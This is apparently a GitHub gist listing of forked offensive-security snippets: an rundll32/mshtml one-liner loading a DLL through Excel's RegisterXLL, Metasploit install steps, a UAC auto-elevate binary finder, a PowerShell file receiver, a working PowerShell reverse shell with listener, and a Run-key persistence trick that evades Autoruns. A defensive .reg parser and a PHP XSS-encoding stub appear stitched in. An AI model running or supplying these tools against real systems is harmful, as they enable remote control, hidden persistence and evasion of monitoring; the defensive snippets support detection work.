sasqwatch
💭 I may be slow to respond.
sasqwatch / excel.bat
Created Apr 10, 2017 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner: loads the file at the given path as a DLL through Excel's RegisterXLL();
REM the target does not need an .xll extension, which is why a .log name works here.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
sasqwatch / gist:9a84a57ab4536a631ce9cb8c9740ec56
Created Apr 13, 2017 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux (both commands below must run from an elevated command prompt)
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
sasqwatch / findelevate.py
Created May 25, 2017 — forked from riyazwalikar/findelevate.py
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
# Usage: findelevate.py C:\Windows\System32\
# Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx]
import sys
import os
import glob
import re
import subprocess
if len(sys.argv) < 2:
    print("Usage: findelevate.py <PATH>")
    sys.exit(1)
# sigcheck -m dumps the embedded manifest; auto-elevating binaries declare <autoElevate>true</autoElevate>
for exe in glob.glob(os.path.join(sys.argv[1], "*.exe")):
    out = subprocess.run(["sigcheck.exe", "-accepteula", "-nobanner", "-m", exe],
                         capture_output=True, text=True, errors="replace").stdout
    if re.search(r"<autoElevate>\s*true\s*</autoElevate>", out, re.IGNORECASE):
        print(exe)
sasqwatch / receivefile.ps1
Created May 31, 2017 — forked from staaldraad/receivefile.ps1
Small PowerShell script to bind to a port, accept a connection and stream it to a file. Useful for ```cat blah.exe | nc 192.168.1.7 8080```
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
# Copy the socket to the file until the sender closes the connection (Read returns 0 at EOF)
do {
$read = $stream.Read($buffer, 0, $buffer.Length);
if($read -gt 0){ $fileStream.Write($buffer, 0, $read); }
} while($read -gt 0)
$fileStream.Close();
$client.Close();
$socket.Stop();
sasqwatch / mini-reverse.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse.ps1
A reverse shell in PowerShell
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
# Block until the listener sends a command (Read returns 0 once it hangs up)
$read = $stream.Read($buffer, 0, 1024);
if($read -le 0){ break }
$cmd = $encoding.GetString($buffer, 0, $read).Trim();
if($cmd -eq 'exit'){ break }
# Run it in this process and send the output (or the error text) back over the socket
try { $out = Invoke-Expression $cmd 2>&1 | Out-String } catch { $out = $_ | Out-String }
$writer.Write($out);
} while($true)
$writer.Close();
$socket.Close();
sasqwatch / mini-reverse-listener.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse-listener.ps1
A reverse shell listener in PowerShell
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){ exit 1 }
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
$stream = $client.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 4096
# Send each typed command to the connected shell and print whatever it sends back
do {
$cmd = read-host "PS"; $writer.WriteLine($cmd); $writer.Flush()
if($cmd -eq 'exit'){ break }
$read = $stream.Read($buffer, 0, $buffer.Length)
write-output ([System.Text.Encoding]::ASCII.GetString($buffer, 0, $read))
} while($read -gt 0)
$client.Close(); $socket.Stop()
sasqwatch / test.reg
Created Jul 5, 2017 — forked from hasherezade/test.reg
Demo: persistence key not visible to Sysinternals Autoruns (in a default configuration; read more: https://twitter.com/hasherezade/status/849756054145699840)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
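The trick in the .reg file above is that the command lives in the key's unnamed (Default) value, written as `@` in .reg syntax, rather than in a named value. As an added example (not code from the gist or its author), the Python below parses a .reg export, lists every value under the Run/RunOnce autostart keys, and separates out the ones stored in the (Default) value so a reviewer can check for exactly this placement. The sample .reg text is constructed for this example: it reuses the key from the gist and adds an invented HKCU entry and an invented named OneDrive value for contrast.

```python
"""Added example: find autostart commands hidden in the (Default) value of Run/RunOnce keys."""
import re

# Constructed sample input (not a real export): the gist's key plus two invented entries.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Users\\u\\AppData\\Roaming\\updater.exe"
'''

# Key suffixes treated as autostart locations (assumption: only the classic Run/RunOnce keys).
AUTOSTART_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")

# A value line is either @=... (the unnamed default value) or "name"=...
_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def unescape(s):
    """Undo .reg string escaping: \\ becomes \ and \" becomes "."""
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg(text):
    """Yield (key, value_name, data) for every string value; value_name is '(Default)' for '@'."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]            # [HKEY_...\Path] header selects the current key
            continue
        m = _VALUE_LINE.match(line)
        if key is None or not m:
            continue                     # banner line, blank line or non-string data
        name, data = m.group(1), m.group(2)
        name = '(Default)' if name == '@' else unescape(name[1:-1])
        if data.startswith('"') and data.endswith('"'):
            data = unescape(data[1:-1])  # REG_SZ data is a quoted, escaped string
        yield key, name, data


def autostart_entries(text):
    """Return [(key, value_name, command)] for all values under Run/RunOnce keys."""
    return [(k, n, d) for k, n, d in parse_reg(text)
            if k.lower().endswith(AUTOSTART_SUFFIXES)]


def default_value_persistence(text):
    """The subset the gist relies on: autostart commands stored in the unnamed (Default) value."""
    return [e for e in autostart_entries(text) if e[1] == '(Default)']


if __name__ == '__main__':
    for key, name, cmd in autostart_entries(SAMPLE_REG):
        flag = '  <-- (Default) value' if name == '(Default)' else ''
        print(f'[{key}] {name} = {cmd}{flag}')
```

The same parser can be pointed at a full `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run` dump; only string (REG_SZ) data is decoded here, so REG_EXPAND_SZ entries (`hex(2):...`) are listed with their raw hex data rather than a command.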
XSS Protection in 5 common contexts
<?php
/**
* XSS protection function for HTML context only
* @usecases
* <title>use this function if output reflects here or as a content of any HTML tag.</title>
* e.g., <span>use this function if output reflects here</span>
* e.g., <div>use this function if output reflects here</div>
* @description
* Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution.
*/
// The function body is cut off in this preview; the name below is assumed, not the gist's own.
// htmlspecialchars() encodes < and > (and also & " ') so reflected input stays text in HTML content.
function xss_html_context($input, $encoding = 'UTF-8')
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, $encoding);
}
sasqwatch / wordpress2.md
Created Oct 19, 2017 — forked from cure53/wordpress2.md
WordPress SOME (Same-Origin Method Execution) bug in plupload.flash.swf
sasqwatch / wordpress.md
Created Oct 19, 2017 — forked from cure53/wordpress.md
WordPress Flash XSS in flashmediaelement.swf